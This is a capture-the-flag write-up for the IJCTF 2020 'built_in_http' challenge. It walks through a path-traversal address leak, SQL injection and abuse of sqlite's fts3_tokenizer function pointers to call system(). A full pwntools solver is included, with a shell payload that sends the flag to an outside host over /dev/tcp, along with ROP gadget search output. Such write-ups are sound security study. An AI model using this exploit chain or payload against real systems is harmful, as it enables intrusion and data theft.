circleous notes

IJCTF 2020 built_in_http Write-Up

The intended solution was using a buffer overflow on [^fopen_test:%arg_path%^]. I did notice this bug first since I’m guessing that the binary should have a buffer overflow because there is no stack canary. The problem is that, I don’t know there exist sqlite ATTACH DATABASE which you can use it to write into file system and then use it with fopen_test to pwn. The another bug I found was the sqlite injection and use fts3 module, this is something I didn’t want to touch first since I know the fopen_test bug, but since I don’t have any option left (It has been 6 hours finding how to write file into system and I still didn’t know how to do it), I decided to use fts3 module exploit. Go to author excellent write-up on built_in_http to get the gist of this challenge I’ll not discuss deeper on the reversing part, just the basic idea of exploiting sqlite fts3 module and try to add some comments how I solved this challenge.


This is known bug and has been left unfixed for years. The bug is in fts3_toknizer sql function, see the implementation here
fts3_tokenizer(<name>, <pointer>), if <pointer> is specified, it’ll try to load the blob from specified pointer. The blob is in fact a sqlite3_tokenizer_module struct,
struct sqlite3_tokenizer_module {
  int iVersion;                  /* currently 0 */

  ** Create and destroy a tokenizer.  argc/argv are passed down from
  ** the fulltext virtual table creation to allow customization.
  int (*xCreate)(int argc, const char **argv,
                 sqlite3_tokenizer **ppTokenizer);
  int (*xDestroy)(sqlite3_tokenizer *pTokenizer);

  ** Tokenize a particular input.  Call xOpen() to prepare to
  ** tokenize, xNext() repeatedly until it returns SQLITE_DONE, then
  ** xClose() to free any internal state.  The pInput passed to
  ** xOpen() must exist until the cursor is closed.  The ppToken
  ** result from xNext() is only valid until the next call to xNext()
  ** or until xClose() is called.
  /* TODO(shess) current implementation requires pInput to be
  ** nul-terminated.  This should either be fixed, or pInput/nBytes
  ** should be converted to zInput.
  int (*xOpen)(sqlite3_tokenizer *pTokenizer,
               const char *pInput, int nBytes,
               sqlite3_tokenizer_cursor **ppCursor);
  int (*xClose)(sqlite3_tokenizer_cursor *pCursor);
  int (*xNext)(sqlite3_tokenizer_cursor *pCursor,
               const char **ppToken, int *pnBytes,
               int *piStartOffset, int *piEndOffset, int *piPosition);
Since we are dealing with function pointers, getting a code execution from this should be fairly easy. Suppose we have a heap address leak, we could craft a sqlite3_tokenizer_module struct in heap with
SELECT replace(hex(zeroblob(10000)), '00', x'sqlite3_tokenizer_module struct here');
Then load the fts3_tokenizer module from heap with
SELECT fts3_tokenizer('<tokenizer name>', x'<crafted sqlite3_tokenizer_module_address>');
Trigger code execution via crafted function pointers from sqlite3_tokenizer_module struct,
  • xCreate with CREATE VIRTUAL TABLE pwn USING fts3(tokenize=<tokenizer name>);
  • xDestroy with DROP TABLE pwn;
  • xOpen with INSERT INTO pwn VALUES(x'values here');


To pwn this, first we need a leak. read /proc/self/maps to get heap and lib address leak via LFI in /static/../../../../ endpoint.
from pwn import *
HOST, PORT = ('', 31339)

def read_file(path):
 r = remote(HOST, PORT)
 r.send(b'GET /static/../../../../../../../../../../../../..%b HTTP/1.1\r\n\r\n' % path)
 res = r.recvall()
 return res

heap_base = 0
sqlbase = 0

def read_map():
 global heap_base, sqlbase
 maps = read_file(b'/proc/self/maps')[:-1]
 maps = maps.split(b'\n')
 for line in maps:
  if b'[heap]' in line:
   heap_base = int(line.split(b'-')[0], 16)
  elif b'libsqlite3' in line:
   sqlbase = int(line.split(b'-')[0], 16)
def exploit():
 print("[!] heap %x" % heap_base)
 print("[!] %x" % sqlbase)
The next part is to craft sqlite3_tokenizer_module, to do this we can use built in simple fts module,
static sqlite3_tokenizer_module simpleTokenizerModule = {
server = ELF('./server', 0)
system = server.plt['system']
simple_create = 0x2abd0
simple_destroy = 0x23c40
simple_open = 0x2ab40
simple_close = 0x19080
simple_next = 0x2cb50

def admin(var, key=b'20c366aada34781158ae700cec09a4ce'):
 r = remote(HOST, PORT)
 r.send(b'GET /admin?key=%b&var=%b HTTP/1.1\r\n\r\n' % (key, var))

def fire(heap_base, sqlbase, offset=0):
 fts_module_struct_addr = heap_base + offset

 fts_module_struct  = p64(0) # version
 fts_module_struct += p64(sqlbase + simple_create) # xCreate
 fts_module_struct += p64(sqlbase + simple_destroy) # xDestroy
 fts_module_struct += p64(sqlbase + simple_open) # xOpen
 fts_module_struct += p64(sqlbase + simple_close) # xClose
 fts_module_struct += p64(sqlbase + simple_next) # xNext

 payload  = b"asd';"
 payload += b"select replace(hex(zeroblob(10000)), '00', x'4242424242424242%b4343434343434343');" % (hexlify(fts_module_struct))
 payload += b"select fts3_tokenizer('exploit', x'%b');" % hexlify(p64(fts_module_struct_addr))
 payload += b"create virtual table pwn using fts3(tokenize='exploit');"
 payload += b"-- "
 admin(payload.replace(b" ", b"/**/"))
override one of function pointers to get a code execution, a screenshot when I override xCreate

This is actually great, rax holds pointer to our crafted sqlite3_tokenizer_module , since we can get a hold of whats inside rax, we just need to find a reliable gadget
λ › ropper --file ./ --search 'mov ???, [rax]' | grep call
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: mov ???, [rax]
[INFO] File: ./
0x0000000000078fd2: mov eax, dword ptr [rax]; call qword ptr [rax + 0x28];
0x000000000008d367: mov eax, dword ptr [rax]; mov rdi, rax; call qword ptr [rax + 0x38];
0x0000000000078fd1: mov rax, qword ptr [rax]; call qword ptr [rax + 0x28];
0x000000000008d366: mov rax, qword ptr [rax]; mov rdi, rax; call qword ptr [rax + 0x38];
Luckily, the latest version of libsqlite3 in Ubuntu 16.04.6 has this nice gadget we can use. We can both control next call ([[rax] + 0x38]) and the first parameter with rdi. 0x000000000008d366: mov rax, qword ptr [rax]; mov rdi, rax; call qword ptr [rax + 0x38];
The final step is just to override xCreate with the gadget and include our shell payload. Full solver,
from pwn import *
from binascii import hexlify

# HOST, PORT = ('', 31339)
HOST, PORT = ('', 3000)

def read_file(path):
 r = remote(HOST, PORT)
 r.send(b'GET /static/../../../../../../../../../../../../..%b HTTP/1.1\r\n\r\n' % path)
 res = r.recvall()
 return res

def admin(var, key=b'20c366aada34781158ae700cec09a4ce'):
 r = remote(HOST, PORT)
 r.send(b'GET /admin?key=%b&var=%b HTTP/1.1\r\n\r\n' % (key, var))

def read_map():
 maps = read_file(b'/proc/self/maps')[:-1]
 maps = maps.split(b'\n')
 for line in maps:
  if b'[heap]' in line:
   heap_base = int(line.split(b'-')[0], 16)
  elif b'libsqlite3' in line:
   sqlbase = int(line.split(b'-')[0], 16)
 return heap_base, sqlbase

server = ELF('./server', 0)
system = server.plt['system']
simple_create = 0x2abd0
simple_destroy = 0x23c40
simple_open = 0x2ab40
simple_close = 0x19080
simple_next = 0x2cb50

def fire(heap_base, sqlbase, offset=0x45190):
 fts_module_struct_addr = heap_base + offset
 shell_addr = fts_module_struct_addr + 0x38

 fts_module_struct  = p64(shell_addr) # version
 fts_module_struct += p64(sqlbase + 0x000000000008d366) # xCreate
 fts_module_struct += p64(sqlbase + simple_destroy) # xDestroy
 fts_module_struct += p64(sqlbase + simple_open) # xOpen
 fts_module_struct += p64(sqlbase + simple_close) # xClose
 fts_module_struct += p64(sqlbase + simple_next) # xNext
 # 0x000000000008d366: mov rax, qword ptr [rax]; mov rdi, rax; call qword ptr [rax + 0x38];

 shell = b'bash -c "/flag > /dev/tcp/xx.xx.xx.xx/9090"\x00'
 shell = shell.ljust(0x38, b'\x00')
 shell += p64(system)

 # pwndbg> dq $rax
 # 000000000199b190     0000000000000000 deadbeefdeadbeef
 # 000000000199b1a0     00007fd8b5a07c40 00007fd8b5a0eb40
 # 000000000199b1b0     00007fd8b59fd080 00007fd8b5a10b50
 # 000000000199b1c0     4343434343434343 20632d2068736162
 #                                       ^ ---- our shell starts here
 # 000000000199b1d0     3e2067616c662f22 63742f7665642f20
 # 000000000199b1e0     33312e3330312f70 2f39312e36352e33
 # 000000000199b1f0     0000002230393039 0000000000000000
 # 000000000199b200     00000000004022d0 4444444444444444

 payload  = b"asd';"
 payload += b"SELECT replace(hex(zeroblob(10000)), '00', x'4242424242424242%b4343434343434343%b4444444444444444');" % (hexlify(fts_module_struct), hexlify(shell))
 payload += b"select fts3_tokenizer('exploit', x'%b');" % hexlify(p64(fts_module_struct_addr))
 payload += b"create virtual table kok using fts3(tokenize='exploit');"
 payload += b"-- "
 admin(payload.replace(b" ", b"/**/"))

def exploit():
 for off in range(0, 0x1000, 8):
  heap_base, sqlbase = read_map()
  print("[!] heap %x" % heap_base)
  print("[!] %x" % sqlbase)
  fire(heap_base, sqlbase, 0x45190 + off)


# ijctf{Nah...sqlite_B0F_1s_H4rd!}
Since the offset on the server might be different I need to brute force a little and after that we just need to spawn a listener and we will be greeted by the flag.
Listening on [] (family 0, port 9090) Connection from 55242 received!